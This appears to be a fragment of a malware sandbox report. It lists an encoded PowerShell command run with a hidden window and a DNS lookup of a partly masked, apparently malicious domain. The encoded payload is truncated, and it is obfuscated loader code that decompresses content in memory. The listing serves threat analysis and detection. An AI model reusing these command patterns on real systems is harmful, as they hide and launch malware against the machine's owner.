Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E IAAoAC4AKAAnAE4ARQB3AC0AbwBiACcAKwAnAEoARQAnACsAJwBjAHQAJwApACAAIABTAHkAUwBUAGAARQBgAG0AYAAuAGAAaQBvAC4AYwBvAE0AUABSAGAARQBTAFMASQBPAG4ALgBgAEQAYABFAEYAbABgAEEAVABlAFMAVABSAEUAYABBAE0AKAAgAF...
- DNS ASK vd###anoo.club
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E IAAoAC4AKAAnAE4ARQB3AC0AbwBiACcAKwAnAEoARQAnACsAJwBjAHQAJwApACAAIABTAHkAUwBUAGAARQBgAG0AYAAuAGAAaQBvAC4AYwBvAE0AUABSAGAARQBTAFMASQBPAG4ALgBgAEQAYABFAEYAbABgAEEAVABlAFMAVABSAEUAYABBAE0AKAAgAF...' (with hidden window)